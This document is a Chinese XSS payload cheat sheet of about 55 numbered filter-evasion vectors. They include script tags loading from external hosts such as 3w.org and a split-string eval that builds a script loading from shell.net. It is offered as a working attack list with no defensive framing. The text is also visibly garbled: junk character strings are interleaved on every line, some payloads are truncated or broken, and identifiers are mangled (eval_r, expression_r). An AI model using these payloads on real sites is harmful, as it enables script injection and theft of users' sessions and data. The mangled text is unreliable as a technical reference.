(1)普通的XSS JavaScript注入) j$ V& f' p7 Y" l$ d
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" C- `! e& f) }. d( }(99)另类弹框! o( F$ e4 E' u' K1 M# A" G% |
<q/oncut=alert()>1
! c; g0 s( ?! W% y; k<s/onclick=alert()>b
& Q* w+ ?, O" T9 C9 G <XSS=" onclick="alert(1)//">clickme</SSX=">
. y1 {+ M$ _# G8 U3 D5 \3 K <zzz onclick=alert`1`>clickme</zzz> + n6 k0 a& ]8 m7 ^4 j8 [
<a onclick=alert`1`>clickme</a> Y8 f* M: K E+ \0 S* K
<a=">clickme</a=">
: H" g9 a- D. w5 m' R<a=">clickme</a>
* f# |% M2 n u! s9 }<z=">clickme</z=">
_8 M; S8 J& }8 G0 a# \8 K<z onclick=alert`1`>clickme</z>
( O8 i5 a: p' a2 I
& l: i: o: [+ p, L L(2)IMG标签XSS使用JavaScript命令' I! u) e! I& \7 N1 U: p9 E; P
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
8 i% m. ^, O# K' L, Z9 {( M# o9 ?
(3)IMG标签无分号无引号
/ e7 f% G' C, n' \' ^1 I<IMG SRC=javascript:alert(‘XSS’)>+ q b1 u# a5 Q8 y5 j
+ H9 W. h. S1 D/ Y+ t(4)IMG标签大小写不敏感
2 y7 b" A' I# O) r# X9 H$ z<IMG SRC=JaVaScRiPt:alert(‘XSS’)>' e0 [' O8 A+ }
% t; D ]0 X7 C( h
(5)HTML编码(必须有分号)
- W# m3 V( t; Y" W9 q1 g<IMG SRC=javascript:alert(“XSS”)>
5 h+ O; q3 o4 ]% A/ l/ ~. r; E# {( {0 q# Z5 p* Z& `( d/ ]" n
(6)修正缺陷IMG标签
/ f9 v1 F a0 Z: @<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
8 {8 C {1 D, I& v) |! \9 s0 d
% X* X: i0 v, C(7)formCharCode标签(计算器)
( e w5 F# O% ^) t3 j<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
6 ~7 i9 p# S0 t( Y( [
3 A; H1 T9 s5 V# z0 Z" F& Y(8)UTF-8的Unicode编码(计算器)
# e* X% A$ Z$ ~) c' [<IMG SRC=jav..省略..S')>
: c! e; i1 B- {( i* n& y5 b9 f/ B1 K$ u) W. Z, N
(9)7位的UTF-8的Unicode编码是没有分号的(计算器), o! ]1 J$ K) J- F2 t5 K& Y, [( |
<IMG SRC=jav..省略..S')>
9 R+ Q7 m% v5 {5 C8 D" |& |) Q4 y, d: p
(10)十六进制编码也是没有分号(计算器)
) F" W+ C" k! g" }5 @<IMG SRC=\'#\'" /span>
5 \8 A1 M3 m2 `8 [& `5 ~# c. n4 g! a5 N5 o
(11)嵌入式标签,将Javascript分开
5 T# B a' E2 b( w<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>+ h/ w9 A/ P+ V' N! r) u; M) W# L# t
* K3 ?5 K4 \7 B$ |(12)嵌入式编码标签,将Javascript分开. c* Z, P+ H# s6 z% O' T5 J1 W; x
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>0 K( P" X: `9 Z7 R6 i, g/ h
' B" r7 F( ?( j9 w, j(13)嵌入式换行符" @$ u% z, m( [
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>3 o& @+ w- m" k
6 T1 u, d. c8 u$ T$ v(14)嵌入式回车: V( ]) v W6 N$ [7 I* |) v
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
" l, \! Y8 v( ^! ^ D; c4 r% S9 o) n, }2 S8 S/ c+ S+ v3 p
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
: u. g; K; \- [0 i! q7 m2 Q3 o' }<IMG SRC=\'#\'" /span>
$ r1 ~' U; Z: K4 M& R5 y3 R. K' G1 k1 B- `' R- i. D O- |
(16)解决限制字符(要求同页面)
1 V! l6 `* x4 X. }3 I; W<script>z=’document.’</script>% _0 n0 K' G( e3 v Y- r7 L/ M/ d
<script>z=z+’write(“‘</script>' I1 b( U, W7 Q6 p; ~8 X n
<script>z=z+’<script’</script>: o0 n1 q/ B3 }
<script>z=z+’ src=ht’</script>' L h8 g+ k7 ?( d9 X4 L7 o: z8 ]
<script>z=z+’tp://ww’</script>5 E* t' T: P* L' Z
<script>z=z+’w.shell’</script>
9 m4 M$ t6 D4 |2 k3 z7 e<script>z=z+’.net/1.’</script>7 O- Z6 \1 Q) R) [2 \% _& X
<script>z=z+’js></sc’</script>
$ z! {1 c) ?4 d" Y4 R2 r5 O& O v<script>z=z+’ript>”)’</script>
& _( v4 ]" [& @' u- w<script>eval_r(z)</script>
5 m. i d2 ]* Z/ E" E5 x# q$ O; S) T4 z% T& q$ c# e; z, M9 Z' r
(17)空字符
0 Z- Y8 K4 t h, O' @8 ~0 yperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out j+ }6 D# U. D9 o( u- @- O
4 @& K: F0 y! w' G(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
9 C8 B" e. _3 E ?perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
! W& C' Y* h; q/ d# Q% h: a
P+ T) D8 Y; X% z" j(19)Spaces和meta前的IMG标签- ~6 V W+ X1 f
<IMG SRC=\'#\'" javascript:alert(‘XSS’);”>$ t3 p7 x/ Q" H8 {0 z
, a2 ~+ Q8 G! E(20)Non-alpha-non-digit XSS. d( K7 X2 N) ]9 q$ t5 i3 F _
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
8 d: R$ Y* u& h1 l7 H2 A9 q$ f; ]' | h/ Z: _3 m f2 ]" N C) k! ?
(21)Non-alpha-non-digit XSS to 2$ h) a* y3 Y6 ~8 G3 K# Z& Z
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>9 w/ S6 B5 D* r# f4 U6 ~* A
* |, a1 p' B7 u: s
(22)Non-alpha-non-digit XSS to 3
$ l9 f" n+ ^. k. {1 x7 v0 d<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>+ N7 V, _6 q: W
9 N$ m4 k. U( J6 R' B
(23)双开括号
8 O+ k; s: \0 c( E<<SCRIPT>alert(“XSS”);//<</SCRIPT>3 q0 S: Z2 c3 B
! o+ i3 I9 _' J ~/ ]7 a2 a$ x0 E
(24)无结束脚本标记(仅火狐等浏览器)+ O: C0 ^ c) j
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>3 C; x2 _8 Z8 ^/ G' [
6 T$ @! W% H( k3 s, P
(25)无结束脚本标记2
) M( }) m) e9 k<SCRIPT SRC=//3w.org/XSS/xss.js>" \) I/ V7 n4 O
: |3 s/ a. P$ Q# M2 i- t) ^
(26)半开的HTML/JavaScript XSS
! E r) R$ J$ t. s8 C<IMG SRC=\'#\'" /span>8 R( a: k& e6 a& W2 ~6 O5 v0 U9 {* E
6 |- s: Q5 d f1 Z b(27)双开角括号
7 _! t# ?: J, _<iframe src=http://3w.org/XSS.html <
5 L& T( w0 ^, E" b
/ g+ w; p: \: \/ x5 t |(28)无单引号 双引号 分号
) [8 {6 T' F1 a% l# T& k<SCRIPT>a=/XSS/; A r" h* i1 u
alert(a.source)</SCRIPT>
& N, e, s, D' J @+ m! e0 W! Q4 z2 a$ i7 }1 \4 K; O
(29)换码过滤的JavaScript# c+ Z* n4 |9 O! x! ]$ Z# I. u
\”;alert(‘XSS’);//
3 B5 w2 {; ]9 T
2 @( e3 U/ z- G2 U+ m: f: n) u(30)结束Title标签/ X' \# P2 N/ V: z' M# ]
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
3 V; l# f2 @4 U# |) l/ f2 C- ^& M0 L1 ^; n1 y! N- N$ a. F* N
(31)Input Image7 u2 X" e2 }0 ?! |7 A9 O
<INPUT SRC=\'#\'" /span>
" c; b# R8 t3 _$ a% w0 T: U0 h# ?
' l5 ?4 g1 i+ A(32)BODY Image
1 L! z2 ?9 k- s) W- x+ G/ t! b<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
* g1 H/ e1 f7 G. r5 f3 k2 q6 z. \2 l0 N5 Q7 O9 V6 H% b
(33)BODY标签
$ m1 l1 H$ i& q. h<BODY(‘XSS’)>" V2 l3 f2 i+ ]% ^& X# e/ }% }. D5 h$ {) H
5 I3 m$ N d- ^% M* A" g
(34)IMG Dynsrc
3 [6 n+ ~+ @+ z, `7 f f+ B- P<IMG DYNSRC=\'#\'" /span>, ?/ Z9 r& l7 C+ w. y5 [# ?, J6 v
6 S2 u- N6 y9 T5 P(35)IMG Lowsrc+ a3 U/ ]/ v) @) i2 `5 `
<IMG LOWSRC=\'#\'" /span>) y, {* f! I8 t% k3 N/ S# k
6 c" V1 p/ L0 ?( s, Q3 J5 a N
(36)BGSOUND
. U7 H, r$ V& w3 ]<BGSOUND SRC=\'#\'" /span>
0 |: |" m3 m5 U6 y- d1 G; {4 r/ P. q) E D) ?- x
(37)STYLE sheet' ~5 ]9 K1 x7 d! ?7 I
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
. X/ `1 }( B6 H) b0 O
! o8 ~2 L6 F9 c. k( V- m: ?(38)远程样式表1 `# D! f Q) c7 a5 k( F
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
/ {! R ]* v9 H% d4 X9 T# r2 h/ s
2 n6 b% T, B( S! z(39)List-style-image(列表式)
3 a t: j+ H; T5 g<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS# d8 v' K8 w5 L+ s9 Q
$ T/ m A4 Y4 t4 [: R. r; O8 g
(40)IMG VBscript+ ?) y _1 M# q8 X3 G: m4 D! k# O
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS* O6 j6 u0 O: v6 M' X a b( O6 |
9 m: V! z) \/ E( G! X! r
(41)META链接url* E/ d) z5 h+ @& [, a4 b+ p3 A
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>, |# k$ Z% E* Q% V( E' d) h
+ z+ f0 W! M! Q/ d! S0 l+ y) K) j9 u5 }# e
(42)Iframe
& b$ n7 D! o$ [. }& l4 K<IFRAME SRC=\'#\'" /IFRAME>( l; }. w2 G2 |. N7 R
* Q0 ^3 V$ m _/ |$ G5 F! o
(43)Frame, d3 ^; C5 s7 g
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>( Y) b$ Q4 i) ]
8 {8 s- I: h' C- n# D(44)Table
" U) ^- p$ A2 O<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
* y' [: Y1 `' A
$ @7 H- L& j: i2 r1 S/ i( t5 E9 F(45)TD: @& \, n! L ]3 o5 w0 S$ z
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
, ]: s1 O+ f& z. W6 X
5 m' ]. w; z" z$ \' f6 C$ G3 @(46)DIV background-image( t+ m/ i5 C( M) n$ P( x& V, u
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>, @" {$ R4 Q% @0 c$ t$ p; E# V8 d
2 r% x9 c8 ?' y' U: t(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279), L6 c( L5 @$ a& U3 G
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>* I+ ?9 Q. Q# S4 X( R
7 b" U8 _( G/ I3 F- e7 w
(48)DIV expression( Z& U, o0 I% L% a% m3 f
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>" Z( M0 y! W9 A% ~) G
! i, q) I% R0 M8 m2 m(49)STYLE属性分拆表达3 B7 r, ?4 j' M2 n% v8 o& _
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>( [. W! B0 C+ s: V
5 K( x5 a; _6 l1 f+ g- X3 J
(50)匿名STYLE(组成:开角号和一个字母开头)
. j& _1 k) Z3 o, T<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
t% X% v" D) u5 V' m
( c+ V+ l2 G1 Y9 W(51)STYLE background-image
; u6 u: o$ c* [<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>5 g- Z7 B& c! v5 `- K7 }
# u" E: J. x/ u$ R# ^! K1 ?4 C(52)IMG STYLE方式% y- X& q) i v" V$ z# u
exppression(alert(“XSS”))’>( `: f4 S+ V( J5 C
1 P ]) D. `$ y2 |
(53)STYLE background
J: w( k, n' L& j<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
6 \ Q' v- [9 {- p! b2 f
! F4 I; ?0 ?$ v0 s(54)BASE
! S8 H/ p' _% j/ @- a4 g k<BASE HREF=”javascript:alert(‘XSS’);//”>
n2 o; S! w: S9 H0 `' M# T6 R/ @9 f: J, B4 k6 Q4 h
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
" A! [) a, e4 y, L/ `1 i# ]<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
6 s% U Y# O# o |